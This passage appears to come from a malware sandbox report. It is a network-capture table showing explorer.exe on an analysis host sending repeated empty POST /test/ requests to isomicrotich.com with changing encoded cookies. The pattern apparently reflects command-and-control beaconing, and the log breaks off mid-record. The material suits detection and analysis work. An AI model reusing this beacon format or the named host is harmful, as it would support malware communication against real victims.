                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:19 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:19 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9rvt%2BPFVVcEGvdGNgBb0Q8DgGJE1BXbnmMDFY%2B5fZQkIYnQu0qFEwTGN0jOvqrwfYypltTkWmh3OoNMTdRtvxO5cT3eHufH%2BvhdZFcyovW4q7ymfyTe6VZbhe8eqwPBX5Jl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1998af7241f9-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                43192.168.2.762337188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:20 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:20 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FB%2BLHx%2BUqiApk2xapi7XL%2FclsnPdiMpVSx6m1O0MDtOu%2FGR9f8iXN4rFRkWoQ83iIZ7ot6oreZkU8P19HP51HP%2BhP54J31YapkMwdblWhqYK2R9fP0%2Fz9iwaCEzQtICPCyxC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19a058d87c9c-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.762338188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:21 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:21 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAfjzZM4pU9MrP10FZFBkDm9c7x9ua6DEm7TZyQ98RuY6hwnm2tpKwnjFlRNR9D64X7wuKk5sWFULFlFheciPUl%2BFfAINm5rEAdPPYsN8nTzGZR6932BbvLrqC7aF1MmIl3U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19a70b995e79-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.762339188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:22 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:23 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2guMOOde7PqxLMOLmnLW9hkJjIS4UBER1sGSbbuRk75KI%2FDuoNLcUz6ywceMyM4SLyUDPnINq1%2BmV38TsCNJ9WvHu%2BeqTPltnOkVaRE7w2TeOGFPEYJ3oTO8oTEb10fbP6e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19afdde619ef-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.762340188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:23 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:24 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vD9CCGjLNGgQt231UdBffg8EhFwoyE8CitpV6z4pQfBGtCeC64pP4Q6ihsvc9sxgBOKzT1JPsiEG4vl%2FnNAZSwMNaxbA0cl7njw5Qbwj6cw4gsZJCnKFd6EkvaYoW9AJit9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19b67a3841e7-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.762341188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:24 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:25 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ku9Se3rwKWiKZ4z4Ptp3W8bXMOyMBDx1rXOkdb6W8F6J42202DMZilH71%2F90TDFnkEZgj0TkhPRZ8o%2B7PImZ7LxrpT41yJzujBVW5K%2B6rHq5pmAysHNOkHWMgNamsm50tqpQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19be7b4243b6-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.762344188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:26 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:26 UTC597INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mtoRFhUIUrUTwIsZfdTSjz935pvt0M%2BRRvAeXwdm%2FC2FTH41fcnH1HKbpz3Cy7xkTMi19zF37laispL%2F998VBOFqtZ9i7rImYJxx478BJ%2FM23HR9YRjWmO41TDvslK5gPr63"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19c5c8544325-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-10-03 18:47:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                49192.168.2.762346188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:27 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:27 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:27 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtUidlJuebNu5hzZXUk77lchvhiDL%2BoB7%2FcUquOcA1bFm0cZiXmjvy%2BsaifzWCY%2FyXY2Bf1ZNtHHVLlayK2zbwZAJqA%2FBcjpb4eR7jkNMmyB28Lci%2BeKSDnsBuotmPfHIe9m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19cc1bf743b8-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                50192.168.2.762347188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:28 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:28 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQCps9bAsewgiCtwJVMZlZb6RO0qDHhdGgocZ%2F3ZRrm1rId9Q%2B4bDxI91Vf9c4kFYiRYjYRkKmkaruc6eOapduxNqkcp8GU%2BGNiMT6728PBx4H3Eb6p4VNe3eIt5W6OnIACq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19d3ae0e8c48-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                51192.168.2.762348188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:29 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:30 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0scJRJRlbMbbGIuH9XEJA2%2BxwVbwOz9HDqhdK%2BUy3ufmulB2ByI5Y0HxRAiv4%2FxIsDi2cbTwgoNHXNfUgd236BHOA%2FGb4XIZSTgk7zN9QGXV3E%2FhFywca0Dgctnhz3T7uMS2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19da593a2395-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-10-03 18:47:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.762351188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:31 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:31 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjuiLNPLZ8xI6Lh95wSr9sCxSDSWJC9s6gi0Ba06Qs7e8CoX%2F%2FhEirILxWqWVAtZi1YLhDhZhDlu7LBpz5QicyD7B7KOWO1bPc9JH9yGi2O7v3m6cs2ZovcAeZ4SAzkQ%2BWfW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19e41d5972ad-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                53192.168.2.762353188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:32 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:32 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNMf7NEjxqOX8x1zlEQIYEu3yOejptKtIN93wCYXXTVfbH4Op%2BIhu14z%2Bt4LP%2FXMmUQ2s5hm%2FoK008MyP3R1Q6Vmbzg8BuL0C%2BzxlJ%2B479m%2BPHd1PC%2BpyecY4Blh%2B5LgPQ2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19ea7a3180d9-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                54192.168.2.762354188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:33 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:33 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
